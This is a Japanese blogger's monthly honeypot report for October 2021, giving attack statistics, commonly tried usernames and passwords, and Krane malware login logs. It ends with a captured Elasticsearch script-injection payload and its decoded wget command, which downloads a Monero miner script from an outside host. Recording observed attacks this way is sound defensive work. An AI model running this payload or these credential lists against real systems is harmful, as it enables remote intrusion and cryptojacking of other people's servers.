Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2021年10月)

2021年10月04日にApache HTTP Serverにてパストラバーサル脆弱性(CVE-2021-41773)に対する修正バージョンがリリースされた。
バージョン2.4.49のみが該当する脆弱性であり、2.4.50へのアップデートで解消される見込みであったが、2021年10月8日に2.4.50では別のパストラバーサル脆弱性(CVE-2021-42013)があることが判明し、修正バージョン(2.4.51)がリリースされた。

www.jpcert.or.jp

httpd.apache.org

www.nri-secure.co.jp

※うちのハニーポットにはアクセスを確認できず。割と限定的な攻撃?

脆弱性の影響を受けるのは以下条件に該当する場合になる。

  • ドキュメントルート外のファイルがrequire all deniedパラメータにより制限されていない
  • mod_cgiモジュールが有効化されている。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年10月1日-2021年10月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 883,709 ▲1,844,739
2 Honeytrap 749,919 ▲523,547
3 Dionaea 419,244 ▲362,080
4 Heralding 290,754 ▲335,103
5 Rdpy 76,148 ▲82,493
6 Adbhoney 15,789 ▲15,146
7 Mailoney 10,615 ▲3,724
8 ElasticPot 2,733 ▲5,618
9 CitrixHoneypot 1,568 ▲1,490
10 ConPot 1,387 ▲1,817
11 Ciscoasa 1,258 ▲33,653
12 Medpot 711 ▲121
13 Tanner 83 ▲2,966
  • Result
    • 先月と比較して全体のアクセス数が減少

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 568,461 2(↑)
2 Netherlands 474,562 1(↓)
3 China 394,075 3(→)
4 United States 231,655 4(→)
5 India 75,841 9(↑)
6 Vietnam 71,655 11(↑)
7 Brazil 46,562 13(↑)
8 South Korea 33,219 14(↑)
9 Indonesia 29,821 17(↑)
10 Taiwan 28,075 圏外(↑)
11 Japan 24,998 10(↓)
12 Latvia 24,889 16(↑)
13 Sweden 24,718 19(↑)
14 Germany 24,673 15(↑)
15 Monaco 19,813 圏外(↑)
16 Singapore 19,274 8(↓)
17 Mexico 17,223 圏外(↑)
18 Thailand 15,931 圏外(↑)
19 Ukraine 14,398 圏外(↑)
20 Hong Kong 14,314 圏外(↑)
  • Result
    • アクセス数上位の国に変動は無し。
    • 10位以下のアクセス数について先月では圏外だった国がランクインしていた。全体のアクセス数が減少したことで普段ランクインしない国からのアクセスが目立った印象。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,405,632
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 259
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 22
4 CVE-2020-11910 8
5 CVE-2020-8515 CVE-2020-8515 1
  • Result
    • 先月から変更なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 82,429
2 admin 5,917
3 hadoop 4,281
4 user 2,719
5 sa 2,717
6 oracle 1,616
7 knockknockwhosthere 1,568
8 mysql 1,568
9 git 1,554
10 huawei 1,508
11 22 1,398
12 postgres 1,239
13 (empty) 956
14 !root 705
15 2Wire 698
16 guest 645
17 support 480
18 nproc 403
19 0 369
20 test 364
21 blank 353
22 666666 352
23 adm 351
24 debug 350
25 unknown 339
26 anonymous 261
27 sh 253
28 www 239
29 pi 236
30 ftp 230
31 Admin 199
32 web 184
33 data 180
34 db 179
35 wwwroot 173
36 administrator 166
37 ubuntu 153
38 ftpuser 121
39 info 85
40 backup 75
41 helpdesk 72
42 manager 72
43 mail 71
44 contact 70
45 microsoft 70
46 office 70
47 scan 70
48 smtp 70
49 spam 70
50 www-data 63
  • Result
    • 特記事項なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 19,693
2 (empty) 3,426
3 root 1,771
4 knockknockwhosthere 1,568
5 1 1,255
6 blank 1,045
7 123456 1,017
8 password 919
9 12345 769
10 0 529
11 Password 487
12 user 482
13 1234 473
14 666666 425
15 123 421
16 ubnt 405
17 nproc 403
18 0 401
19 support 393
20 master 390
21 alpine 387
22 !ishtar 362
23 backup 359
24 hi3518 358
25 synnet 350
26 unknown 340
27 1q2w3e4r 319
28 12345678 315
29 test 247
30 Passw0rd 219
31 x 205
32 1qaz2wsx 199
33 admin123 160
34 123456789 152
35 abc123 152
36 iloveyou 135
37 111111 120
38 123123 118
39 1234567890 116
40 1234567 115
41 qwerty 110
42 0 109
43 hadoop 93
44 Nr!_CapiBraksjdlfS@4827fVfg1 88
45 raspberry 87
46 321 86
47 system 86
48 123qwe 85
49 postgres 83
50 test123 82
  • Result
    • Nr!_CapiBraksjdlfS@4827fVfg1(44位)はKrane Malwareのアクセスになる。

cujo.com

アクセスログを抽出した結果は以下の通り。

No username password city_name ip country_name
1 root Nr!_CapiBraksjdlfS@3111fVfg1 - 106[.]244[.]10[.]2 South Korea
2 es Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
3 chia Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
4 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
5 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
6 git Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
7 tomcat Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
8 web Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
9 cisco Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
10 www Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
11 steam Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
12 rustserver Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
13 hduser Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
14 csgo Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
15 carlos Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
16 pgsql Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
17 ftpadmin Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
18 docker Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
19 ts3server Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
20 ftp Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
21 wpuser Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
22 wordpress Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
23 rudder Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
24 mcserver Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
25 ts3 Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
26 administrator Nr!_CapiBraksjdlfS@4827fVfg1 Cheyenne 107[.]189[.]13[.]122 United States
27 admin Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
28 deploy Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
29 root Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
30 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
31 es Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
32 test Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
33 root@localhost Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
34 ubuntu Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
35 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
36 chia Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
37 ansible Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
38 oracle Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
39 hadoop Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
40 centos Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
41 postgres Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
42 ftpuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
43 odoo Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
44 esuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
45 vagrant Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
46 guest Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
47 minecraft Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
48 joplin Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
49 cms Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
50 cmsuser Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
51 rust Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
52 user Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
53 jenkins Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
54 mysql Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
55 nagios Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
56 deployer Nr!_CapiBraksjdlfS@4827fVfg1 Atlanta 198[.]98[.]48[.]67 United States
57 chia Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]253[.]199 United States
58 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]253[.]199 United States
59 chia Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
60 es Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
61 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
62 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 Buffalo 199[.]195[.]254[.]38 United States
63 es Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
64 chia Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
65 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
66 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
67 web Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]40[.]193 United States
68 git Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]40[.]193 United States
69 cisco Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]40[.]193 United States
70 chia Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]42[.]170 United States
71 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]42[.]170 United States

⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。 f:id:SYN-ACK:20211114215056j:plain

  • Zmapの観測結果は以下の通り。 f:id:SYN-ACK:20211114215110j:plain

  • Result

    • 特記事項は無し。

最後に

  • 10月はセキュリティイベントが目白押しで楽しみな反面、通常業務以外の作業が多いので乗り切れて安堵している。
  • CodeBlue のセッション動画は再度1日かけて全て見直したいと思う。
  • 個人的にはAVTokyoに(オンラインだけど)初参加できて良かった。AVTOKYO バッジキット購入のため、山手線の移動ルートを考えながら追いついたのが一番の思い出。来年は自宅でOpen xINT CTFにも参加してみたい。

  • 今月のアクセス。
     bashの内容を文字コードに置き換えたアクセス。ASCIIコード変換すると特定サイトから。

IPアドレス:120[.]79[.]156[.]2

Payload  :

{"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)49+(char)56+(char)53+(char)46+(char)49+(char)56+(char)49+(char)46+(char)49+(char)48+(char)46+(char)50+(char)51+(char)52+(char)47+(char)69+(char)53+(char)68+(char)66+(char)48+(char)69+(char)48+(char)55+(char)67+(char)51+(char)68+(char)55+(char)66+(char)69+(char)56+(char)48+(char)86+(char)53+(char)50+(char)48+(char)47+(char)105+(char)110+(char)105+(char)116+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}},"size":1}

 ↓
文字コード部分をPrintable形式にすると以下になる。
 ↓

wget http://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo

仮想通貨Moneroのminerをインストールさせるmalwareのようだ。